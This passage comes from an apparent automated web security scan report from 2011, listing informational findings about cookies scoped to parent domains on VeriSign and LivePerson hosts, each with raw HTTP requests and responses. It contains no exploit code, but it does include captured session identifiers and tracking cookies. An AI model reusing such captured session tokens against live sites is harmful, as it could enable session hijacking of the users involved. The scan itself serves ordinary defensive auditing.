The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hc/71097838/?&site=71097838&cmd=mTagKnockPage&lpCallId=361431335564-444301943760&protV=20&lpjson=1&id=2131228943&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-sales-business-english%7Cnull%7Cchat-ButtonDiv%7C%23chat-sales-business-english-bullet%7Cnull%7Cchat-ButtonDiv-bullet%7C%23voice-sales-business-english%7Cnull%7Cvoice-ButtonDiv%7C%23voice-sales-business-english-bullet%7Cnull%7Cvoice-ButtonDiv-bullet%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/business/products/downloads/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=6491552338753675901; HumanClickSiteContainerID_71097838=Master; LivePersonID=-5110247826455-1315603614:-1:-1:-1:-1; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603612650

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:59 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickACTIVE=1315603619835; expires=Sat, 10-Sep-2011 21:26:59 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:26:59 GMT
Set-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838
Set-Cookie: LivePersonID=-5110247826455-1315603614:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:26:59 GMT; path=/hc/71097838; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 33062

lpConnLib.Process({"ResultSet": {"lpCallId":"361431335564-444301943760","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...

9.26. https://ssl-certificate-center.verisign.ch/process/retail/console_login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ssl-certificate-center.verisign.ch
Path:   /process/retail/console_login

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/console_login HTTP/1.1
Host: ssl-certificate-center.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:42 GMT
Server: Apache
Set-Cookie: TLTHID=34B2B6D6DB2D10DB60D0D1C1D953344E; Path=/; Domain=.verisign.ch
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 11755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...

9.27. https://ssl-certificate-center.verisign.ch/process/retail/production_trial_initial  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ssl-certificate-center.verisign.ch
Path:   /process/retail/production_trial_initial

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/production_trial_initial?productType=HASGCServer&application_locale=VRSN_CH HTTP/1.1
Host: ssl-certificate-center.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:46:42 GMT
Server: Apache
Set-Cookie: TLTHID=34FAB86EDB2D10DB68C5A5440567C536; Path=/; Domain=.verisign.ch
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Location: https://ssl-certificate-center.verisign.ch/process/retail/production_trial_product_selector?uid=fb69022a800687aee2281387e3be2beb&product=GHAPT001
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


9.28. https://ssl-certificate-center.verisign.com/process/retail/console_login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ssl-certificate-center.verisign.com
Path:   /process/retail/console_login

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/console_login HTTP/1.1
Host: ssl-certificate-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:43 GMT
Server: Apache
Set-Cookie: TLTHID=35539628DB2D10DB528F9F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 11759

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...

9.29. https://ssl-certificate-center.verisign.com/process/retail/production_trial_initial  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ssl-certificate-center.verisign.com
Path:   /process/retail/production_trial_initial

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/production_trial_initial HTTP/1.1
Host: ssl-certificate-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:46:44 GMT
Server: Apache
Set-Cookie: TLTHID=35B1A6C8DB2D10DB52919F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Location: https://ssl-certificate-center.verisign.com/process/retail/production_trial_product_selector?uid=21e134a09c6b802996d1066fe9c13ef5&product=GSPT001
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


9.30. https://ssl-certificate-center.verisign.com/process/retail/trustseal_trial_initial  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ssl-certificate-center.verisign.com
Path:   /process/retail/trustseal_trial_initial

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/trustseal_trial_initial HTTP/1.1
Host: ssl-certificate-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:46:45 GMT
Server: Apache
Set-Cookie: TLTHID=36315378DB2D10DB52939F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Location: https://ssl-certificate-center.verisign.com/process/retail/trustseal_trial_new_account?uid=9e535ad90e202dd2be1657e6ee2caf70&product=TRUSTSEALTRIAL
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


9.31. https://trust-center.verisign.ch/process/retail/console_login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.ch
Path:   /process/retail/console_login

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/console_login HTTP/1.1
Host: trust-center.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:46 GMT
Server: Apache
Set-Cookie: TLTHID=37115F40DB2D10DB60DAD1C1D953344E; Path=/; Domain=.verisign.ch
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 11715

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...

9.32. https://trust-center.verisign.ch/process/retail/trust_initial  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.ch
Path:   /process/retail/trust_initial

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/trust_initial HTTP/1.1
Host: trust-center.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:46:46 GMT
Server: Apache
Set-Cookie: TLTHID=372B7DB2DB2D10DB60DBD1C1D953344E; Path=/; Domain=.verisign.ch
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Location: https://trust-center.verisign.ch/process/retail/trust_product_selector?uid=2f451e38320cb4cf9a868171c06fe1c9&product=TRUSTSEAL001
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


9.33. https://trust-center.verisign.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=692D91C2DB2A10DB44B9B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:45 GMT
Server: Apache
Set-Cookie: TLTHID=6B107EF0DB2A10DB6A8ACEC4D1E75D2A; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:07 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 4710
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/x-icon

...... ..........F... ......................h...............(...>...(... ...@.......................................            ................. !....)...9.'&'.(*&.)*(.44-.=?8.BC?...U...]...a.        d...i.    .h...
...[SNIP]...

9.34. https://trust-center.verisign.com/process/retail/console_login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /process/retail/console_login

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/console_login HTTP/1.1
Host: trust-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:48 GMT
Server: Apache
Set-Cookie: TLTHID=383DEE10DB2D10DB49FEB1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 12062

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...

9.35. https://trust-center.verisign.com/process/retail/help_and_support  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /process/retail/help_and_support

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/help_and_support HTTP/1.1
Host: trust-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:53 GMT
Server: Apache
Set-Cookie: TLTHID=3B56F1FADB2D10DB4A1EB1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 138732

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...

9.36. https://trust-center.verisign.com/process/retail/redirect  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /process/retail/redirect

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/redirect HTTP/1.1
Host: trust-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:47:00 GMT
Server: Apache
Set-Cookie: TLTHID=3F6ECAD8DB2D10DB52FC9F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Location: https://trust-center.verisign.com/process/retail/console_home?uid=a5f0b94a4c89f47ae217b662fc5fdac5
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


9.37. https://trust-center.verisign.com/process/retail/session_timeout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /process/retail/session_timeout

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/session_timeout HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vtrh54nwcc; v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____; __fds_fp_id__=44590564957.1; TLTHID=03CA6F76DB2F10DB4BFEB1847A7DDBAF

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:59:40 GMT
Server: Apache
Set-Cookie: TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Set-Cookie: JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; Path=/; Secure
Location: http://www.verisign.com/ssl/buy-ssl-certificates/index.html
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html


9.38. https://trust-center.verisign.com/process/retail/trust_initial  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /process/retail/trust_initial

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/trust_initial?application_locale=VTC_US&promoCode=TSAB9999&UI=PPT HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: http://www.verisign.com/trust-seal/index.html?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:26:31 GMT
Server: Apache
Set-Cookie: TLTHID=62F38DA2DB2A10DB4CE59F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Location: https://trust-center.verisign.com/process/retail/trust_product_selector?uid=54e97416d385e356d49a079c459d836b&product=TRUSTSEAL001
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html


9.39. https://trust-center.verisign.com/process/retail/trust_product_selector  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /process/retail/trust_product_selector

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: http://www.verisign.com/trust-seal/index.html?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTHID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:32 GMT
Server: Apache
Set-Cookie: TLTHID=6380DBE4DB2A10DB44A4B1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
Content-Length: 41019

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">

...[SNIP]...

9.40. https://trust-center.verisign.com/process/retail/trust_product_selector.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /process/retail/trust_product_selector.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/trust_product_selector.do HTTP/1.1
Host: trust-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:47:02 GMT
Server: Apache
Set-Cookie: TLTHID=40B2C62EDB2D10DB53169F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Location: https://trust-center.verisign.com/process/retail/trust_capture_tech_contact_details?uid=25a7ccba99f4ee1a587cdec832e34e73
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


9.41. https://trust-center.verisign.com/rcm/TeaLeafTarget.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/TeaLeafTarget.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /rcm/TeaLeafTarget.html HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
Content-Length: 1103
X-TeaLeaf-Page-Objects: 0
Origin: https://trust-center.verisign.com
X-TeaLeaf-Page-Img-Fail: 1
X-TeaLeaf-Page-Render: 123
X-TeaLeaf: ClientEvent
X-TeaLeaf-UIEventCapture-Version: 2009.11.17.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: text/xml
X-TeaLeaf-Screen-Res: 4
X-TeaLeafType: PERFORMANCE
X-TeaLeafSubType: undefined; INIT
X-TeaLeaf-Page-Url: /process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941
X-TeaLeaf-Browser-Res: 3
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=6A3B7886DB2A10DB4D019F6CAED9DACC; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.6.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719

<ClientEventSet PostTimeStamp="1315621658502" ><ClientEvent Count="1" Type="PERFORMANCE" SubType="INIT" PageId="ID21H27M8S358R0.8013692023232579" TimeDuration="123" DateSince1970="1315621628481" >

...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:27:10 GMT
Server: Apache
Set-Cookie: TLTHID=7A014714DB2A10DB4D2B9F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 32
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

<html>
<body>
OK
</body>
</html>

9.42. https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_gray.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/arrow_progressBar_gray.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/arrow_progressBar_gray.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
